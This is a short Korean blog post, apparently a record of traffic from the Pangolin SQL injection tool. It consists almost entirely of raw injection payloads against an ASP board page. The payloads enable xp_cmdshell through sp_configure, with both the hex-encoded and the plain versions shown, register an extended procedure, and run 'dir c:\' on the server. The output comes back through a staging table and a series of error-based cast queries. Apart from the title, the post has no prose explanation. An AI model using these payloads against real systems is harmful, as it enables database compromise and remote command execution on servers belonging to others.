'xp_cmdshell'에 해당되는 글 1건

  1. 2009.07.23 Pangolin - XP(확장 프로시져) 활성화 명령어 분석

/board_view.asp?num=50%20;exec%20sp_configure%200x41006400200048006f00630020004400690073007400720069006200750074006500640020005100750065007200690065007300,1;
reconfigure;
exec%20sp_configure%200x730068006f007700200061006400760061006e0063006500640020006f007000740069006f006e007300,1;
reconfigure;
exec%20sp_configure%200x780070005f0063006d0064007300680065006c006c00,1;
reconfigure;--

exec sp_configure 'Ad Hoc Distributed Queries',1;
reconfigure;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure xp_cmdshell,1;
reconfigure;--

/bbs_view.asp?num=39%20;exec%20master.dbo.sp_addextendedproc%200x780070005f006400690072007400720065006500,%200x7800700073007400610072002e0064006c006c00--

 

/board_view.asp?num=50 ;create table [pangolin_test_table]([resulttxt] nvarchar(4000) null);--

/board_view.asp?num=50 ;declare @z nvarchar(4000) set @z=0xdir c:\ insert into [pangolin_test_table](resulttxt) exec master.dbo.xp_cmdshell @z;alter table

[pangolin_test_table] add id int not null identity (1,1)--

/board_view.asp?num=50 and (select cast(count(1) as varchar(8000))+char(94) from [web]..[pangolin_test_table])>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] order by [id])

>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 2 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 3 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 4 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 5 id from [pangolin_test_table] order by [id]) )>0--

Posted by 김주일